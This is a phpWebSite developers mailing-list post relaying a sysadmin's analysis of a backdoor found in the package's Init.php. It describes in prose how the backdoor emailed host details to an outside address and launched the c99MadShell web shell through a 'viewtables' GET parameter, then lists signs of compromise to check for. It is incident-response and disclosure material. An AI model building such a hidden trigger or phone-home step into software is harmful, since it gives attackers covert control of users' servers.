Good day,
Here is a follow-up on the written by Jeff Tickle, our systems
administrator.
-------------------------------------------------------------------------
Long story short, upgrade to phpWebSite 1.6.1 from Sourceforge.
The exploit code in Init.php does the following:
1. See if ./files/writetest exists
2. If not, send an email to
dday.rabbit@... with your host name
and the script path, and create /files/writetest
3. If the GET variable 'viewtables' is set, execute c99MadShell.
c99MadShell is a php-based shell, more info here:
http://www.derekfountain.org/security_c99madshell.phpThe attacker would have been restricted to the apache user. So, if you
are using suPHP, the damage won't be as bad, although they could still
upload files to a writable served path. The only way the attacker could
get root privileges is if the apache user could be used to find out
your root password somehow, like if your /etc/shadow file is world
readable or some such.
Things to check for:
1. The exploited code in core/class/Init.php around line 102
2. 'writetest' file under 'files' directory in each phpWebSite
installation
3. '
dday.rabbit@...' destination address in your email logs
4. 'viewtables' GET variable in your web server access logs
1 and 2 mean you have the exploit, 3 means the author was notified, and
4 means someone tried to use it.
I'll post more as I learn more...
-Jeff
--------------------------------------------------------------------------
--
Matthew McNaney
Electronic Student Services
Appalachian State University
Ext. 6493
http://ess.appstate.eduhttp://phpwebsite.appstate.edu------------------------------------------------------------------------------
Check out the new SourceForge.net Marketplace.
It is the best place to buy or sell services for
just about anything Open Source.
http://p.sf.net/sfu/Xq1LFB_______________________________________________
Phpwebsite-developers mailing list
Phpwebsite-developers@...
https://lists.sourceforge.net/lists/listinfo/phpwebsite-developers
